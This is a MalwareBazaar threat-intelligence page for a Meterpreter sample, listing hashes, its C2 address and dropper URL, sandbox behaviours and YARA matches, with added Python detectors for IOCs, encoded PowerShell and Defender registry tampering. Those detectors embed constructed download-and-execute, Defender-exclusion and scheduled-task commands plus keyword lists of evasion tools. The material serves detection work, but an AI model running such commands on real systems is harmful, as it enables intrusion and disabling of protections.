MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Vendor detections: 15

SHA256 hash: 1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29
SHA3-384 hash: cdb5382b1d8631b192c1db9d3b95b2af4c9a8b8995cb285727857fff861421131955320b2409ddae71ab063364933ce4
SHA1 hash: 33e55b7d68f1201200c430de06920b6e5d93080e
MD5 hash: e47133883942fa94487bc7dd9319cd1b
humanhash: lemon-red-item-triple
File name: e47133883942fa94487bc7dd9319cd1b.exe
Signature: Meterpreter
File size: 10'978'959 bytes
First seen: 2025-08-18 15:35:19 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: 965e162fe6366ee377aa9bc80bdd5c65 (45 x BlankGrabber, 13 x CoinMiner, 9 x Efimer)
ssdeep: 196608:S0iw0W8/LaX5A1HeT39IigbauDXURuA3dSYEQVdnSEXPEX:sXW8B1+TtIihuARuA3dS9QV88PEX
Threatray: 1'257 similar samples on MalwareBazaar
TLSH: T1BFB633C977AA08E8D89ED23FD2D5465BA79270A647A883CB6BF00C410F275E4DF35B41
TrID: 66.6% (.EXE) InstallShield setup (43053/19/16)
      16.2% (.EXE) Win64 Executable (generic) (10522/11/4)
      7.7% (.EXE) Win16 NE executable (generic) (5038/12/1)
      3.1% (.EXE) OS/2 Executable (generic) (2029/13)
      3.0% (.EXE) Generic Win/DOS Executable (2002/3)
Magika: pebin
dhash icon: f1e8b2ec8cccdc6c (1 x Meterpreter)
Reporter: abuse_ch
Tags: exe Meterpreter


abuse_ch
Meterpreter C2:
5.83.218.183:4470

Indicators Of Compromise (IOCs)


Below is a list of indicators of compromise (IOCs) associated with this malware sample.

IOC                  ThreatFox Reference
5.83.218.183:4470    https://threatfox.abuse.ch/ioc/1570733/
5.83.218.183:4670    https://threatfox.abuse.ch/ioc/1570734/
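As an added detection example (not MalwareBazaar or ThreatFox code), the Python below matches the two C2 sockets above, plus the dropper URL http://5.83.218.183:666/WindowsSettings.zip listed under Malware Config further down this page, against proxy and firewall log lines, and emits one Suricata rule per IOC. Only the IOCs come from the page; the log lines and the sid range 9000001+ are constructed for illustration.

```python
"""Match this entry's network IOCs against proxy/firewall log lines and turn
them into Suricata rules.

Added example for this MalwareBazaar page; it is not abuse.ch or ThreatFox
code. The IOCs are the ones published on this page; the log lines and the
sid range are constructed for illustration."""
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

IOCS = [
    "5.83.218.183:4470",                            # Meterpreter C2 (ThreatFox 1570733)
    "5.83.218.183:4670",                            # Meterpreter C2 (ThreatFox 1570734)
    "http://5.83.218.183:666/WindowsSettings.zip",  # dropper URL from the Malware Config section
]

SOCKET_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def parse_ioc(ioc):
    """Normalise an IOC to (ip, port, path); path is None for a bare socket."""
    if "://" in ioc:
        u = urlsplit(ioc)
        port = u.port or (443 if u.scheme == "https" else 80)
        return u.hostname, port, u.path or "/"
    host, _, port = ioc.rpartition(":")
    ip_address(host)  # raises ValueError if the host part is not an IP literal
    return host, int(port), None


def match_log_lines(lines, iocs=IOCS):
    """Return (line_no, 'ip:port', exact_url) for every log line that touches
    an IOC socket. exact_url is True only when the line also carries the IOC's
    URL path, so a bare connect to 5.83.218.183:666 is still reported."""
    sockets = {}
    for ioc in iocs:
        ip, port, path = parse_ioc(ioc)
        sockets[(ip, port)] = path
    hits = []
    for n, line in enumerate(lines, 1):
        for ip, port in SOCKET_RE.findall(line):
            key = (ip, int(port))
            if key not in sockets:
                continue
            path = sockets[key]
            hits.append((n, f"{ip}:{port}", bool(path and path in line)))
    return hits


def suricata_rules(iocs=IOCS, sid_base=9000001):
    """One rule per IOC: a TCP SYN rule for bare C2 sockets, an HTTP URI rule
    for the dropper URL. sid_base is a constructed local range."""
    rules = []
    for i, ioc in enumerate(iocs):
        ip, port, path = parse_ioc(ioc)
        sid = sid_base + i
        if path is None:
            rules.append(
                f'alert tcp $HOME_NET any -> {ip} {port} '
                f'(msg:"Meterpreter C2 {ip}:{port} (MalwareBazaar)"; flow:to_server; flags:S,12; '
                f'classtype:trojan-activity; sid:{sid}; rev:1;)')
        else:
            rules.append(
                f'alert http $HOME_NET any -> {ip} {port} '
                f'(msg:"Meterpreter stager download {path}"; flow:to_server,established; '
                f'http.method; content:"GET"; http.uri; content:"{path}"; '
                f'classtype:trojan-activity; sid:{sid}; rev:1;)')
    return rules


# Constructed proxy / firewall lines (not from the page) to exercise the matcher.
CONSTRUCTED_LOG = [
    "2025-08-18T15:40:01Z fw    ALLOW 10.0.0.23:51234 -> 5.83.218.183:4470",
    "2025-08-18T15:40:03Z proxy GET http://5.83.218.183:666/WindowsSettings.zip 200 10978959",
    "2025-08-18T15:40:09Z fw    ALLOW 10.0.0.23:51240 -> 198.51.100.7:443",
    "2025-08-18T15:41:12Z fw    ALLOW 10.0.0.23:51251 -> 5.83.218.183:4670",
]

if __name__ == "__main__":
    for hit in match_log_lines(CONSTRUCTED_LOG):
        print("HIT", hit)
    print("\n".join(suricata_rules()))
```

The sandbox run further down the page also shows the payload reaching 5.83.218.183 on port 4670, so blocking the whole IP is the cheaper control; the per-port rules are what you want for retro-hunting in flow logs where the IP alone may be too coarse.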

Intelligence


File Origin
# of uploads :
1
# of downloads :
58
Origin country :
NL
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
Loader.exe
Verdict:
No threats detected
Analysis date:
2025-08-14 04:38:50 UTC
Tags:
n/a

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict:
Malicious
Score:
96.5%
Tags:
metasploit trojan shell sage
Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a file in the %temp% subdirectories
Restart of the analyzed sample
Creating a window
Running batch commands
Creating a process with a hidden window
Launching a process
Creating synchronization primitives
Searching for synchronization primitives
Connection attempt
Sending an HTTP GET request
Creating a file
Sending a custom TCP request
Creating a process from a recently created file
Launching cmd.exe command interpreter
Using obfuscated Powershell scripts
Unauthorized injection to a system process
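The sandbox reports obfuscated PowerShell scripts, batch commands and processes started with hidden windows. The Python below is an added example (not part of this entry or of any sandbox's tooling) of the first thing an analyst does with such a process tree: pull the -EncodedCommand payload out of the command line, decode its UTF-16LE base64, and flag download-and-execute and Defender-exclusion keywords. The command lines, the embedded script and the TEST-NET address 203.0.113.10 are constructed; the sample's actual command lines are not published on this page.

```python
"""Decode PowerShell -EncodedCommand payloads from process command lines and
flag the download-and-execute / evasion keywords the sandbox reports above.

Added example, not part of the MalwareBazaar entry or any sandbox's code. The
command lines below are constructed; the real ones are not published here."""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, case-insensitively.
ENC_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")

# Keywords worth a triage look; matched as whole words, case-insensitively.
SUSPICIOUS = [
    "ExecutionPolicy Bypass", "FromBase64String", "Invoke-WebRequest", "IWR",
    "DownloadString", "IEX", "Invoke-Expression", "Set-MpPreference",
    "Add-MpPreference", "ExclusionPath", "schtasks", "bcdedit",
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -enc/-EncodedCommand, or None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:  # truncated or tampered payload (EDR field limits are common)
        return None
    return raw.decode("utf-16-le", errors="replace")


def encode_command(script):
    """Encode a script exactly as powershell.exe -EncodedCommand expects (test data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage_command_line(cmdline):
    """Decode if needed, then report which SUSPICIOUS keywords appear in the
    visible command line (minus the base64 blob) or in the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = ENC_SWITCH.sub(" ", cmdline) + ("\n" + decoded if decoded else "")
    found = [k for k in SUSPICIOUS
             if re.search(r"\b" + re.escape(k) + r"\b", haystack, re.I)]
    return {"encoded": decoded is not None, "script": decoded, "indicators": found}


# Constructed command lines modelled on the behaviour above (hidden window,
# execution-policy bypass, encoded payload, scheduled task). 203.0.113.10 is a
# TEST-NET address, not the C2 on this page.
CONSTRUCTED_SCRIPT = (
    "Add-MpPreference -ExclusionPath $env:PUBLIC; "
    "Invoke-WebRequest http://203.0.113.10/WindowsSettings.zip -OutFile $env:TEMP\\w.zip; "
    "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))"
)
CONSTRUCTED_CMDLINES = [
    "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc " + encode_command(CONSTRUCTED_SCRIPT),
    'cmd.exe /c schtasks /create /tn WindowsScreen /tr "C:\\Users\\Public\\Documents\\WindowsScreen.exe" /sc onlogon',
    "powershell.exe -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for c in CONSTRUCTED_CMDLINES:
        r = triage_command_line(c)
        print(f"encoded={r['encoded']} indicators={r['indicators']}")
```

Decode before you keyword-match: the keywords are invisible in the raw command line, which is the whole point of the encoding, and a blob that fails base64 validation usually means your telemetry truncated the field rather than that the command was benign.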
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
expand lolbin microsoft_visual_cc overlay overlay packed packed pyinstaller threat
Result
Threat name:
Metasploit, Meterpreter
Detection:
malicious
Classification:
phis.troj.spyw.evad
Score:
100 / 100
Signature
Adds extensions / path to Windows Defender exclusion list (Registry)
AI detected malicious Powershell script
Allocates memory in foreign processes
Antivirus detection for dropped file
Blacklisted process start detected (Windows program)
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Contains functionality to check if the process is started with administrator privileges
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
Disable UAC(promptonsecuredesktop)
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disable Windows Defender Security Center Settings (registry)
Disables the Smart Screen filter
Disables virtualization based memory integrity
Disables Windows Defender (deletes autostart)
Disables Windows Defender Tamper protection
Encrypted powershell cmdline option found
Found malware configuration
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Found suspicious ZIP file
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Modifies controlled folder access of windows defender exploit guard
Modifies security policies related information
Modifies Windows Defender signatures updates days
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Uses bcdedit to modify the Windows boot settings
Uses known network protocols on non-standard ports
Uses regedit.exe to modify the Windows registry
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Metasploit Payload
Yara detected MetasploitPayload
Yara detected Meterpreter
Yara detected Powershell download and execute
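Most of the registry signatures above (Defender exclusions and real-time protection, Tamper Protection, Security Center notifications, SmartScreen, virtualization-based memory integrity, the driver blocklist, UAC's secure desktop) land in a handful of well-known keys. The Python below is an added example, not vendor or sandbox code, that evaluates Sysmon Event ID 13 (registry value set) records against those keys. The rule table is my own selection and its value semantics (for example TamperProtection 5 = on, 4 = off) are stated as assumptions in the comments; the events are constructed to resemble Sysmon fields, not taken from this sample's run.

```python
"""Detect the Defender / UAC / boot-integrity tampering the signatures above
describe, from Sysmon registry value-set events (Event ID 13).

Added example for this MalwareBazaar page; it is not vendor or sandbox code.
The rule table is a selection of documented Windows settings (assumption: the
value semantics in the comments), and the events below are constructed."""
import re

# (TargetObject regex, values that indicate tampering or None for any write, label)
TAMPER_RULES = [
    (r"\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware$", {"1"},
     "Defender disabled via policy"),
    (r"\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring$", {"1"},
     "Real-time protection disabled"),
    (r"\\Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\", None,
     "Defender exclusion added"),
    (r"\\Windows Defender\\Features\\TamperProtection$", {"0", "4"},  # assumption: 5 = on, 4 = off
     "Tamper Protection turned off"),
    (r"\\Windows Defender Security Center\\Notifications\\DisableNotifications$", {"1"},
     "Defender notifications suppressed"),
    (r"\\Policies\\Microsoft\\Windows\\System\\EnableSmartScreen$", {"0"},
     "SmartScreen disabled"),
    (r"\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled$", {"0"},
     "Memory integrity (HVCI) disabled"),
    (r"\\Control\\CI\\Config\\VulnerableDriverBlocklistEnable$", {"0"},
     "Vulnerable driver blocklist disabled"),
    (r"\\Policies\\System\\PromptOnSecureDesktop$", {"0"},
     "UAC secure-desktop prompt disabled"),
    (r"\\Policies\\System\\EnableLUA$", {"0"}, "UAC disabled"),
]


def parse_details(details):
    """Sysmon renders numeric data as 'DWORD (0x00000001)'; return it as a
    decimal string so it compares against the rule table. Other data is
    returned stripped."""
    m = re.fullmatch(r"(?:DWORD|QWORD) \(0x([0-9A-Fa-f]+)\)", details.strip())
    return str(int(m.group(1), 16)) if m else details.strip()


def evaluate_registry_events(events):
    """Return (Image, label, TargetObject) for every Event ID 13 matching a rule."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        target, value = ev["TargetObject"], parse_details(ev["Details"])
        for pattern, bad_values, label in TAMPER_RULES:
            if re.search(pattern, target, re.I) and (bad_values is None or value in bad_values):
                hits.append((ev["Image"], label, target))
    return hits


def summarise_by_image(hits):
    """Count hits per writing process; several from one image (as with the
    .reg files pushed through regedit.exe in the graph below) is the signal."""
    counts = {}
    for image, _, _ in hits:
        counts[image] = counts.get(image, 0) + 1
    return counts


def _ev(image, target, details, event_id=13):
    return {"EventID": event_id, "Image": image, "TargetObject": target, "Details": details}


# Constructed Sysmon-style events (not from this sample's run).
REGEDIT = "C:\\Windows\\regedit.exe"
PWSH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CONSTRUCTED_EVENTS = [
    _ev(REGEDIT, "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware", "DWORD (0x00000001)"),
    _ev(REGEDIT, "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring", "DWORD (0x00000001)"),
    _ev(PWSH, "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Public", "DWORD (0x00000000)"),
    _ev(REGEDIT, "HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled", "DWORD (0x00000000)"),
    _ev(REGEDIT, "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\\TamperProtection", "DWORD (0x00000005)"),  # 5 = on: benign
    _ev("C:\\Windows\\explorer.exe", "HKCU\\Control Panel\\Desktop\\Wallpaper", "C:\\Users\\user\\Pictures\\a.jpg"),  # unrelated
    _ev(REGEDIT, "", "", event_id=1),  # process-create event, ignored
]

if __name__ == "__main__":
    found = evaluate_registry_events(CONSTRUCTED_EVENTS)
    for image, label, target in found:
        print(f"{label}: {target} (by {image})")
    print(summarise_by_image(found))
```

The Sigma hits above ("Suspect Svchost Activity", "Powerup Write Hijack DLL") cover the injection side of this sample; this check covers the registry side, and the per-image count is what separates a policy-managed host (one write from the Group Policy client) from regedit.exe rewriting half a dozen security settings in a row.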
Behaviour
Behavior Graph ID: 1759441
Sample: 4nSoi8xhY4.exe
Start date: 18/08/2025
Architecture: WINDOWS
Score: 100
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 25 other signatures

Process tree recovered from the graph (dropped files and per-process signatures in parentheses):

4nSoi8xhY4.exe (drops unicodedata.pyd, ucrtbase.dll, tk86t.dll (all PE32+) and 51 other files under C:\Users\user\AppData\Local\...; Suspicious powershell command line found; Bypasses PowerShell execution policy; Found pyInstaller with non standard icon)
  4nSoi8xhY4.exe (child)
    powershell.exe (drops C:\Users\Public\Documents\...\PowerRun.exe (PE32+), Script_Run.bat (DOS) and C:\Users\Public\...\WindowsSettings.zip; Loading BitLocker PowerShell Module)
      cmd.exe (Uses bcdedit to modify the Windows boot settings)
        powershell.exe (drops WimProvider.dll.mui, VhdProvider.dll.mui, UnattendProvider.dll.mui (PE32) and 47 other files; Loading BitLocker PowerShell Module)
          DismHost.exe
          Dism.exe
        PowerRun.exe (Multi AV Scanner detection for dropped file; Uses regedit.exe to modify the Windows registry)
          PowerRun.exe
            PowerRun.exe
              regedit.exe (Changes security center settings (notifications, updates, antivirus, firewall); Changes the view of files in windows explorer (hidden files and folders); Blacklisted process start detected (Windows program); 7 other signatures)
        PowerRun.exe
          PowerRun.exe
            PowerRun.exe
              regedit.exe (Disables virtualization based memory integrity; Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry; Disables the Smart Screen filter; 3 other signatures)
        6 other processes (Disables Windows Defender (deletes autostart)), among them PowerRun.exe and Conhost.exe
      conhost.exe
    cmd.exe
      cmd.exe (Suspicious powershell command line found)
        powershell.exe (connects to 5.83.218.183 ports 4670, 49696, 49697, BRIGHTBOX-ASGB, United Kingdom; drops C:\Users\Public\Documents\WindowsScreen.exe (PE32+))
          WindowsScreen.exe (drops unicodedata.pyd, ucrtbase.dll, select.pyd (PE32+) and 46 other files; Multi AV Scanner detection for dropped file; Found pyInstaller with non standard icon)
            WindowsScreen.exe (child; drops C:\Users\user\AppData\...\winfirewall.exe (PE32+); Creates an undocumented autostart registry key)
              cmd.exe
                winfirewall.exe (Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes)
                  svchost.exe
                conhost.exe
              cmd.exe
                conhost.exe
                schtasks.exe
      conhost.exe
    cmd.exe (Suspicious powershell command line found; Encrypted powershell cmdline option found; Uses schtasks.exe or at.exe to add and modify task schedules; Uses bcdedit to modify the Windows boot settings)
      cmd.exe
        powershell.exe (drops C:\Users\Public\Documents\svhost.exe (PE32+); Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file)
          svhost.exe (Antivirus detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures)
            svchost.exe (Contains functionality to change the desktop window for a process (likely to hide graphical interactions); Contains functionality to inject threads in other processes; Contains functionality to inject code into remote processes; Contains functionality to check if the process is started with administrator privileges)
      conhost.exe
    cmd.exe
      cmd.exe (Encrypted powershell cmdline option found)
        powershell.exe
          powershell.exe
            conhost.exe
      conhost.exe
winfirewall.exe (top-level start; Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes)
  svchost.exe
svchost.exe (top-level start; connects to 127.0.0.1)
rundll32.exe (top-level start)
Verdict:
inconclusive
YARA:
5 match(es)
Tags:
Executable PDB Path PE (Portable Executable) PE File Layout Win 64 Exe x64
Threat name:
Win64.Trojan.Egairtigado
Status:
Malicious
First seen:
2025-08-14 04:38:52 UTC
File Type:
PE+ (Exe)
Extracted files:
1600
AV detection:
12 of 24 (50.00%)
Threat level:
  5/5
Result
Malware family:
metasploit
Score:
  10/10
Tags:
family:metasploit backdoor credential_access defense_evasion evasion execution persistence privilege_escalation pyinstaller ransomware trojan
Behaviour
Delays execution with timeout.exe
Modifies data under HKEY_USERS
Modifies registry class
Runs .reg file with regedit
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Detects Pyinstaller
Enumerates physical storage devices
Drops file in Windows directory
Adds Run key to start application
Indicator Removal: File Deletion
Boot or Logon Autostart Execution: LSASS Driver
Drops startup file
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Boot or Logon Autostart Execution: Active Setup
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies trusted root certificate store through registry
Modify Registry: Disable Windows Driver Blocklist
Modifies boot configuration data using bcdedit
MetaSploit
Metasploit family
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender TamperProtection settings
Modifies Windows Defender notification settings
Modifies firewall policy service
Modifies security service
UAC bypass
Windows security bypass
Malware Config
C2 Extraction:
5.83.218.183:4470
Dropper Extraction:
http://5.83.218.183:666/WindowsSettings.zip
Verdict:
Suspicious
Tags:
n/a
YARA:
n/a
Unpacked files
SHA256 hash:
1622d2b40a4fdbbb296ecf1e6668fbdbe6f10b84ffa1bb15217b91924cc71a29
MD5 hash:
e47133883942fa94487bc7dd9319cd1b
SHA1 hash:
33e55b7d68f1201200c430de06920b6e5d93080e
Malware family:
Metasploit
Verdict:
Malicious
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:APT_Lazarus_Loader_Dec_2020_1
Author:Arkbird_SOLG
Description:Detect loader used by Lazarus group in december 2020
Reference:Internal Research
Rule name:DebuggerCheck__API
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:Detect_PyInstaller
Author:Obscurity Labs LLC
Description:Detects PyInstaller compiled executables across platforms
Rule name:Detect_Remcos_RAT
Author:daniyyell
Description:Detects Remcos RAT payloads and commands
Rule name:golang_bin_JCorn_CSC846
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:lsadump
Author:Benjamin DELPY (gentilkiwi)
Description:LSA dump program (bootkey/syskey) – pwdump and others
Rule name:MALWARE_Win_Meterpreter
Author:ditekSHen
Description:Detects Meterpreter payload
Rule name:meth_peb_parsing
Author:Willi Ballenthin
Rule name:PyInstaller
Author:@bartblaze
Description:Identifies executable converted using PyInstaller. This rule by itself does NOT necessarily mean the detected file is malicious.
Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)
Rule name:ThreadControl__Context
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:upxHook
Author:@r3dbU7z
Description:Detect artifacts from 'upxHook' - modification of UPX packer
Reference:https://bazaar.abuse.ch/sample/6352be8aa5d8063673aa428c3807228c40505004320232a23d99ebd9ef48478a/
Rule name:Windows_Trojan_Metasploit_38b8ceec
Description:Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon).
Rule name:Windows_Trojan_Metasploit_47f5d54a
Author:Elastic Security
Rule name:Windows_Trojan_Metasploit_7bc0f998
Description:Identifies the API address lookup function leverage by metasploit shellcode
Rule name:Windows_Trojan_Metasploit_c9773203
Description:Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Reference:https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments